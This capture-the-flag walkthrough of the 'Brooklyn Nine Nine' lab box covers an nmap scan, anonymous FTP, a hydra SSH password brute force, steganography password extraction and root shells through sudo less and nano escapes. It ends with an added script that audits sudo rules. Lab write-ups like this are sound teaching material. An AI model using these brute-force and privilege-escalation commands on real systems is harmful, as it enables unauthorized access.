# Brooklyn Nine Nine

![](/files/-MbbrLdUUMlPBescrUcv)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**):

```
nmap -Pn 10.10.146.230
```

![](/files/-MbbtMnQvlivMdfrfDot)

Detailed Nmap scan:

Command breakdown:

* (**-sV**): Service version
* (**-sC**): Default nmap scripts
* (**-p**): Specifying ports 21, 22, 80
* (**-oN nmap**): Saving the output into a file called nmap

```
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.146.230
```

![](/files/-MbbtPTUPROqxT0yQEyY)

## Enumeration

### Port 21: FTP

It looks like we can log in through FTP as anonymous, so let's do that. (Use `anonymous` for both the username and the password, or just hit Enter for the password.)

```
ftp 10.10.146.230
```

![](/files/-Mbbu6IOris1hRup8wlF)

Let's list the files in this directory.

![](/files/-MbbuCuXCQVoTDsmaXIk)

It looks like there is a file which is a note to a person called `Jake`. Let's transfer this file to our machine and read what it has to say.

```
get note_to_jake.txt
```

![](/files/-MbbuYIoMld1HSwSzmnF)

Let's now read the file.

![](/files/-MbbueQcLUC1u72G0b2o)

It looks like Jake did not change his password, as mentioned by a person called `Amy`. The note also gives us a username, `Holt`, so we now have three usernames.

### Port 80: HTTP

Let's visit the website.

![](/files/-MbbvCvugiKlsF1OzRPY)

It's a Brooklyn Nine Nine poster. Let's look at the source code.

![](/files/-MbbvMnCUE6MqLLqk2L6)

We have something interesting: the source mentions steganography, which is the practice of concealing a message within another message. Let's download the image onto our machine; the name of the image is in the source code.

```
wget http://10.10.146.230/brooklyn99.jpg
```

![](/files/-MbbyEQBOmCFeUN9VM3w)

## Exploitation

### FTP

We can try to use hydra to find the SSH password for `Jake`.

```
hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.146.230 ssh
```

![](/files/-MbbwW38KRAl9P445u84)

We found the password, so let's log in through SSH.

```
ssh jake@10.10.146.230
```

![](/files/-MbbwgqpnNJ4VELClzRN)

And we are logged in. We can find the user flag here.

![](/files/-MbbxBSy1KC7ovgimTSI)

### HTTP

We can use a tool called [stegcracker](https://github.com/Paradoxis/StegCracker) to find hidden messages within files. If you do not have it, you can install it with this command:

```
apt-get install stegcracker
```

![](/files/-MbbzL7RTt9tDhJ8MUff)

Now you can use stegcracker:

```
stegcracker brooklyn99.jpg
```

![](/files/-MbbzuM9FafeQmFeV9DU)

We have a password, which may be the passphrase for the file. Let's see what the file is hiding.

```
steghide --extract -sf brooklyn99.jpg
```

![](/files/-Mbc03xnTMxMQXWtzFSV)

Now we have the password for Holt, so let's log in through SSH.

```
ssh holt@10.10.146.230
```

![](/files/-Mbc0H1hB--CrPgzsIjK)

## Privilege Escalation

### Jake

Let's run `sudo -l` to see what Jake can run as root.

```
sudo -l
```

![](/files/-MbbxI7vH4249OUCUh99)

It looks like we can run the `less` command as root, which lets us view the contents of files, so let's use it to check what `/root/root.txt` contains.

```
sudo /usr/bin/less /root/root.txt
```

![](/files/-MbbxcLSPasCfPWdok5R)

We can also try to become root using the commands found in [GTFOBins](https://gtfobins.github.io/gtfobins/less/#sudo).

![](/files/-Mbc0nwkQoc1wF1MpyUU)

Let's use these commands to become root.

```
sudo less /etc/profile
!/bin/sh
```

![](/files/-Mbc0xYagAHxBaGtGbUs)

### Holt

Let's run `sudo -l` to see what Holt can run as root.

```
sudo -l
```

![](/files/-Mbc1EaMR9_n7t5LhH-S)

We can run nano as root, so let's go to [GTFOBins](https://gtfobins.github.io/gtfobins/nano/#sudo) to find the commands to escalate privileges to root.

![](/files/-Mbc1UnVqeFu89dKcvha)

Let's run these commands.

```
sudo nano
^R^X
reset; sh 1>&0 2>&0
```

![](/files/-Mbc1j9VF9SUJhmjc4za)

We are now root. You can find the root flag in `/root/`
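Both escalation paths come from sudo rules that allow an interactive program (`less`, `nano`) to run as root. The script below is an added example, not part of the original write-up or the target box: it audits `sudo -l` style output for such rules. The `RISKY` list, the function names and the sample rules are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag sudo rules that let a
# user reach a root shell through an interactive program.
# RISKY is a short, non-exhaustive list chosen for this example (assumption);
# less and nano are the two programs seen on this box.
RISKY="less more man vi vim view nano ed"

# Read `sudo -l` style output on stdin and print the path of every allowed
# command whose program name is in RISKY and is not covered by a NOEXEC tag.
audit_sudo_rules() {
    awk -v risky="$RISKY" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    /^[ \t]*\(/ {                                 # rule lines start with "(runas)"
        noexec = 0
        sub(/^[ \t]*\([^)]*\)[ \t]*/, "")         # drop the "(runas)" prefix
        m = split($0, cmds, /,[ \t]*/)            # one entry per allowed command
        for (i = 1; i <= m; i++) {
            c = cmds[i]
            # Tags such as NOPASSWD: or NOEXEC: precede a command and carry
            # over to the commands after it until EXEC: switches them back.
            while (match(c, /^[A-Z_]+:[ \t]*/)) {
                tag = substr(c, 1, RLENGTH); c = substr(c, RLENGTH + 1)
                if (tag ~ /^NOEXEC:/) noexec = 1
                else if (tag ~ /^EXEC:/) noexec = 0
            }
            split(c, w, " ")                      # w[1] is the program path
            k = split(w[1], parts, "/")           # parts[k] is its basename
            if (!noexec && (parts[k] in bad)) print w[1]
        }
    }'
}

# Constructed sample input: the first two rules are modelled on what this page
# found for jake and holt; the last two are hardened forms (NOEXEC, sudoedit).
sample_sudo_l() {
    cat <<'EOF'
User example may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/less
    (ALL) NOPASSWD: /bin/nano, /usr/bin/systemctl status nginx
    (root) NOEXEC: /usr/bin/less /var/log/syslog
    (root) sudoedit /etc/motd
EOF
}

sample_sudo_l | audit_sudo_rules   # prints /usr/bin/less and /bin/nano
```

On a real host, pipe in the output of `sudo -l -U <user>` run as root. `NOEXEC` only blocks the shell escape, so a pager running as root can still open other files, which is why `sudoedit` or a narrowly scoped command is the safer rule.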


